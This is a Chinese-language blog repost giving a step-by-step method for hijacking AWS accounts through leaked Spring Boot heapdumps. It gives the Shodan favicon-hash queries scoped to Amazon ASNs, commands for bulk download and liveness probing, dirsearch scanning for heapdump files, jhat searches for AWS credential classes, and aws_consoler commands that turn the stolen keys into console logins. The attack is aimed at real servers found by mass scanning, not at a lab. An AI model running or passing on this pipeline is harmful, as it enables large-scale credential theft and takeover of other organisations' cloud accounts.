當前位置:
首頁 >
前端技术
> javascript
>内容正文
javascript
从Spring Boot信息泄露到AWS控制台劫持(攻破aws亚马逊服务器)
生活随笔
收集整理的這篇文章主要介紹了
从Spring Boot信息泄露到AWS控制台劫持(攻破aws亚马逊服务器)
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
0x01 引言
?
全球云廠商有很多,本文主要針對Spring Boot信息泄露在aws上的利用。
0x02 正文
1) 用shodan分析spring boot服務器在asn上分布的情況
https://beta.shodan.io/search/facet?query=http.favicon.hash%3A116323821&facet=asnaws的服務器主要分布在as16509和as14618。
2) 通過shodan命令行下載數(shù)據(jù)
as16509:
shodan download as16509 'http.favicon.hash:116323821 asn:"as16509"' --limit -1as14618:
shodan download as14618 'http.favicon.hash:116323821 asn:"as14618"' --limit -13) 通過httpx探測存活的url
shodan parse --fields ip_str,port --separator : as16509.json.gz | httpx -silent -o as16509.txt4) 利用dirsearch掃描存在的heapdump文件
- 所用字典:
- 掃描命令
- 查看結果
5)利用jhat分析heapdump
jhat -port 7001 heapdump主要通過以下關鍵詞來尋找憑證:
- 關鍵詞1: com.amazonaws.auth.BasicAWSCredentials
- 關鍵詞2 :com.amazonaws.auth.BasicSessionCredentials
6)利用aws_consoler來偽造aws控制臺登陸憑證。憑證能否生成和所擁有的權限大小,取決于iam所分配的權限。
aws_consoler -v -a <accessKey> -s <secretKey>aws_consoler -v -a <awsAccessKey> -s <awsSecretKey> -t <sessionToken>復制url到瀏覽器中執(zhí)行,成功登陸到AWS控制臺。
0x03 參考
https://github.com/NetSPI/aws_consoler
https://github.com/maurosoria/dirsearch
https://github.com/projectdiscovery/httpx
https://github.com/LandGrey/SpringBootVulExploit
總結
以上是生活随笔為你收集整理的从Spring Boot信息泄露到AWS控制台劫持(攻破aws亚马逊服务器)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: poj3276 反转 挑战程序设计竞赛
- 下一篇: Shell字符串比较(等于、不等于、大于